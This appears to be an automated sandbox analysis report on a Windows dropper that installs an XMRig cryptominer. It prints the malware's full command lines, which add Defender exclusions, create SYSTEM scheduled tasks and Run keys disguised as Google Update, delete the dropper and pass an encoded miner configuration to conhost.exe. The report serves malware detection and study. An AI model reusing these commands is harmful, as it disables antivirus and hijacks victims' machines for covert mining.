Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
323s -
max time network
1781s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231129-en
General
-
Target
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 2176 created 1360 2176 6vHkJ4UErTSS5ECD.exe 10 PID 2176 created 1360 2176 6vHkJ4UErTSS5ECD.exe 10 PID 2176 created 1360 2176 6vHkJ4UErTSS5ECD.exe 10 PID 2176 created 1360 2176 6vHkJ4UErTSS5ECD.exe 10 PID 2156 created 1360 2156 updater.exe 10 PID 2156 created 1360 2156 updater.exe 10 PID 2156 created 1360 2156 updater.exe 10 PID 2156 created 1360 2156 updater.exe 10 PID 2532 created 1360 2532 conhost.exe 10 PID 2156 created 1360 2156 updater.exe 10 -
XMRig Miner payload 26 IoCs
resource yara_rule behavioral5/memory/2336-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-73-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-79-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-83-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-85-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-87-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-91-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-93-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-95-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-97-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-99-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-101-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-103-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-105-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-109-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-113-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2336-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2252 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2156 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2584 taskeng.exe -
resource yara_rule behavioral5/memory/2336-66-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-70-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-73-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-77-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-79-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-81-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-83-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-85-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-87-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-89-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-91-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-93-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-95-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-97-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-99-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-101-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-103-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-105-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-109-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-113-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2336-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2156 set thread context of 2532 2156 updater.exe 53 PID 2156 set thread context of 2336 2156 updater.exe 47 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 6vHkJ4UErTSS5ECD.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2468 schtasks.exe 2524 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1716 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00c12f20474eda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2176 6vHkJ4UErTSS5ECD.exe 2176 6vHkJ4UErTSS5ECD.exe 2384 powershell.exe 2176 6vHkJ4UErTSS5ECD.exe 2176 6vHkJ4UErTSS5ECD.exe 2568 powershell.exe 2176 6vHkJ4UErTSS5ECD.exe 2176 6vHkJ4UErTSS5ECD.exe 2176 6vHkJ4UErTSS5ECD.exe 2176 6vHkJ4UErTSS5ECD.exe 2624 powershell.exe 2156 updater.exe 2156 updater.exe 2160 powershell.exe 2156 updater.exe 2156 updater.exe 1212 powershell.exe 2156 updater.exe 2156 updater.exe 2156 updater.exe 2156 updater.exe 2532 conhost.exe 2532 conhost.exe 2156 updater.exe 2156 updater.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeDebugPrivilege 2156 updater.exe Token: SeAssignPrimaryTokenPrivilege 1716 WMIC.exe Token: SeIncreaseQuotaPrivilege 1716 WMIC.exe Token: SeSecurityPrivilege 1716 WMIC.exe Token: SeTakeOwnershipPrivilege 1716 WMIC.exe Token: SeLoadDriverPrivilege 1716 WMIC.exe Token: SeSystemtimePrivilege 1716 WMIC.exe Token: SeBackupPrivilege 1716 WMIC.exe Token: SeRestorePrivilege 1716 WMIC.exe Token: SeShutdownPrivilege 1716 WMIC.exe Token: SeSystemEnvironmentPrivilege 1716 WMIC.exe Token: SeUndockPrivilege 1716 WMIC.exe Token: SeManageVolumePrivilege 1716 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1716 WMIC.exe Token: SeIncreaseQuotaPrivilege 1716 WMIC.exe Token: SeSecurityPrivilege 1716 WMIC.exe Token: SeTakeOwnershipPrivilege 1716 WMIC.exe Token: SeLoadDriverPrivilege 1716 WMIC.exe Token: SeSystemtimePrivilege 1716 WMIC.exe Token: SeBackupPrivilege 1716 WMIC.exe Token: SeRestorePrivilege 1716 WMIC.exe Token: SeShutdownPrivilege 1716 WMIC.exe Token: SeSystemEnvironmentPrivilege 1716 WMIC.exe Token: SeUndockPrivilege 1716 WMIC.exe Token: SeManageVolumePrivilege 1716 WMIC.exe Token: SeLockMemoryPrivilege 2336 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2568 wrote to memory of 2468 2568 powershell.exe 30 PID 2568 wrote to memory of 2468 2568 powershell.exe 30 PID 2568 wrote to memory of 2468 2568 powershell.exe 30 PID 2252 wrote to memory of 2600 2252 cmd.exe 33 PID 2252 wrote to memory of 2600 2252 cmd.exe 33 PID 2252 wrote to memory of 2600 2252 cmd.exe 33 PID 2624 wrote to memory of 2528 2624 powershell.exe 34 PID 2624 wrote to memory of 2528 2624 powershell.exe 34 PID 2624 wrote to memory of 2528 2624 powershell.exe 34 PID 2584 wrote to memory of 2156 2584 taskeng.exe 36 PID 2584 wrote to memory of 2156 2584 taskeng.exe 36 PID 2584 wrote to memory of 2156 2584 taskeng.exe 36 PID 1212 wrote to memory of 2524 1212 powershell.exe 45 PID 1212 wrote to memory of 2524 1212 powershell.exe 45 PID 1212 wrote to memory of 2524 1212 powershell.exe 45 PID 2156 wrote to memory of 2532 2156 updater.exe 53 PID 1844 wrote to memory of 1716 1844 cmd.exe 48 PID 1844 wrote to memory of 1716 1844 cmd.exe 48 PID 1844 wrote to memory of 1716 1844 cmd.exe 48 PID 2156 wrote to memory of 2336 2156 updater.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2524
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1708
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1844
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2532
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
PID:2468
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2600
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC1⤵PID:2528
-
C:\Windows\system32\taskeng.exetaskeng.exe {5188B0C6-89D1-464F-890C-487C4159761C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
83KB
MD57d1d4e696d8c1a5fd603a715854c5a5e
SHA10744a37c99410b9a3e6ae6db30f7bc532d04a22d
SHA256b609c700e649225b170e21943b384414c4ceb66f9db2bdfc72546b5ef1933e08
SHA5121cc44753c73bac710ef88663501becf0117eef18442a05d9f740e4783b2b4a5bdb058a97d2e409a769dba254a48c9019cd281f8748111fff66d37db4373666b8
-
Filesize
45KB
MD5e6d383a88e9ffe3d919af82e1a0cfdb1
SHA155c5078350fcdedc2ba39ca2df1ca779921a57e3
SHA2564d07ed5f82cf67c9aa2c3f5d0fe8309eb122874edb09086e709d1394b227367e
SHA512db3e2009454c58792dbee8cfb91657569e23429b2534fe5e902295348ec2a8debccdd490e56826dd071ca9df186593f82381561f47f08cdffa2b829a28fda436
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UZH4JNS33WL58SJ4FDLL.temp
Filesize7KB
MD51ce9e489df198a2043014548ddbe038c
SHA157454bca8f0d058992ef0a4ff866b0d5f64c19cb
SHA256268cd89ac4fcc7cbfb493552acff8480bc1e1cfc50d93961395492699b92252c
SHA512a8b448b8a16571a0e280b9603310e5bbd707d6dfa9c4aa7a80190365585664c32308e2a03a627e9d36063f18bcb872d21adf62858c9ae84738de0ab91a99e91f
-
Filesize
15KB
MD544c8da26b18fdb2894cff541d78ef70e
SHA12c81911c23ce8c2377239accbcbb57c484d0c9fc
SHA25681c6771bae786736363c1dd37c6b081cd835e7be53960e208007e95e242eb985
SHA5123f9eb4e4eb5ac12141430132e506b4a728925518e98b8e751a34ca9dbe2bfd521dceb9edebeb7ea19816d38a28fe1cfecadab5209a3febc7c1834aeb0e3226fa